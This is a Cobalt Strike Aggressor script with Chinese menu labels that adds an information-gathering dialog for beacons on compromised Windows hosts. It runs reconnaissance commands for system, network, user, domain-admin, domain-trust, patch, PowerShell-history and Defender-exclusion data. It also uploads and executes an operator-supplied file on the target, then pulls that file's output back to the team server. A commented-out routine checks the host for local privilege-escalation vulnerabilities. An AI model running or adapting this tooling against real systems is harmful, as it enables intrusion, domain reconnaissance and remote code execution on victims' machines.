#define functions

local('$bid');

sub sysinfo{
    btask($bid, "=====Systeminfo=====", "");
    bshell($bid, "systeminfo");
}

sub ipconfig{
    btask($bid, "=====Ipconfig=====", "");
    bshell($bid, "ipconfig /all");
}

sub netstat{
    btask($bid, "=====Connection=====", "");
    bshell($bid, "netstat -ano | findstr LISTENING");
}

sub software{
    btask($bid, "=====Software=====", "");
    bshell($bid, "wmic product get name,version");
}

sub ps_soft{
    btask($bid, "=====Software (powershell)=====", "");
    bpowershell($bid, 'Get-WmiObject -class Win32_Product | Select-Object -Property name,version');
}

sub runprocs{
    btask($bid, "=====Startup process=====", "");
    bshell($bid, "wmic startup get command,caption");
}

sub pros_detail{
    btask($bid, "=====Running process=====", "");
    bshell($bid, "wmic process get caption,executablepath,commandline");
}

sub tasks{
    btask($bid, "=====Task=====", "");
    bshell($bid, "schtasks /query /fo LIST /v");
}

sub users{
    btask($bid, "=====Users=====", "");
    bshell($bid, "net user && net localgroup administrators && net session && net share");
}

sub hotfix{
    btask($bid, "=====Hotfix=====", "");
    bshell($bid, "wmic qfe get Caption,Description,HotFixID,InstalledOn");
}

sub firewall{
    btask($bid, "=====Firewall=====", "");
    bshell($bid, "netsh firewall show config");
}

sub proxy{
    btask($bid, "=====Proxy=====", "");
    breg_query($bid, "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "x64");
}

sub chistory{
    btask($bid, "=====Cmd & Powershell history=====", "");
    bshell($bid, "type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt");
}

sub recent{
    btask($bid, "=====Recent=====", "");
    bshell($bid, "dir %APPDATA%\\Microsoft\\Windows\\Recent");
}

sub domain{
    btask($bid, "=====Domain=====", "");
    btask($bid, "Part One", "");
    bshell($bid, "net view /domain && net group /domain && net group \"domain computers\" /domain && net accounts /domain && net group \"Domain Controllers\" /domain ");
    btask($bid, "Part Two", "");
    bshell($bid, "Nslookup -type=SRV _ldap._tcp && nltest /domain_trusts && netdom query pdc");
    btask($bid, "Part Tree", "");
    bshell($bid, "net user /domain && wmic useraccount get /all && dsquery user && net group \"domain admins\" /domain");
}

sub defender{
    btask($bid, "=====Defender exclusions info=====");
    btask($bid, "Exclusions Paths");
    breg_query($bid, "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths", "x64");
    btask($bid, "Exclusions Extensions");
    breg_query($bid, "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions", "x64");
    btask($bid, "Exclusions Processes");
    breg_query($bid, "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes", "x64");
}

sub main{
    foreach $func (keys($3)){
        if ($3[$func] eq 'true'){
            eval($func.'();');
        }
    }
    if ($3['automatic'] ne ""){
        bupload($bid, $3['automatic']);
        #$fpath = $3['automatic'];
        $fname = getFileName(replace($3['automatic'], '\\\\', "/"));
        brun($bid,$fname);
        if ($3['redirect'] ne ""){
            show_message("You have filled in the redirection option, which will automatically download the redirection file to your team server after the script runs !");
            sleep(5 * 1000);
            bdownload($bid, $3['redirect']);
        }
    }
}

# sub audit{
#     $bid = $1['@'];
#     $fname = beacon_info($bid,"computer")."-info.txt";
#     $lpath = script_resource("temp\\ $+ $fname");
#     $suggester = script_resource("local\\windows-exploit-suggester.py");
#     $db = script_resource("local\\2020-04-10-mssb.xls");
#     $audit_fname = script_resource("logs\\".beacon_info($bid,"computer")."-audit.txt");
#     bshell($bid,"systeminfo >  $+ $fname");
#     bdownload($bid, $fname);
#     #sleep(3 * 1000);
#     foreach %item (downloads()){
#             if (%item['name'] eq $fname){
#                 $rpath = %item['lpath'];
#                 sync_download($rpath, $lpath);
#             }
#         } 
#     #sleep(3 * 1000);
#     if (-exists $lpath){
#         $cmd = $suggester." -i  $+ $lpath  -d  $+ $db";
#         $process = exec("cmd.exe /c ".$cmd);
#         @data = readAll($process);
#         $out = openf(">" . $audit_fname); 
#         foreach $line (@data){
#             writeb($out, $line."\r\n");
#         }         
#         closef($out);
#         closef($process);
#         deleteFile(replace($fname, "\\\\", "/"));
#         exec("cmd.exe /c start ".script_resource("logs\\"));
#         }
#     }


#append menus

    menu "信息收集"{

        item "信息采集器"{
            $bid = $1['@'];
            $dialog = dialog("信息收集",%(bid => $bid), &main);
            dialog_description($dialog, "收集目标主机的各类信息");
            drow_checkbox($dialog, "sysinfo", "系统信息", "");
            drow_checkbox($dialog, "ipconfig", "网卡配置信息", "");
            drow_checkbox($dialog, "netstat", "监听的TCP端口列表", "");
            drow_checkbox($dialog, "software", "已安装软件列表", "");
            drow_checkbox($dialog, "ps_soft", "已安装软件列表(使用powershell)", "");
            drow_checkbox($dialog, "runprocs", "启动进程列表", "");
            drow_checkbox($dialog, "pros_detail", "运行进程列表", "");
            drow_checkbox($dialog, "tasks", "计划任务列表", "");
            drow_checkbox($dialog, "users", "本地用户、管理员、共享和会话列表", "");
            drow_checkbox($dialog, "hotfix", "补丁列表", "");
            drow_checkbox($dialog, "firewall", "防火墙配置信息", "");
            drow_checkbox($dialog, "proxy", "系统代理配置信息", "");
            drow_checkbox($dialog, "chistory", "Cmd和Powershell历史记录", "");
            drow_checkbox($dialog, "recent", "最近使用记录", "");
            drow_checkbox($dialog, "defender", "Defender信息", "");
            drow_checkbox($dialog, "domain", "域信息", "");
            drow_file($dialog, "automatic", "使用自动化脚本: ");
            drow_text($dialog, "redirect", "脚本输出文件[可选]: ");
            dbutton_action($dialog, "运行");
            dialog_show($dialog);
        }

        # item "Audit available lpe vulnerability"{
        #     audit($1);
        # }
    }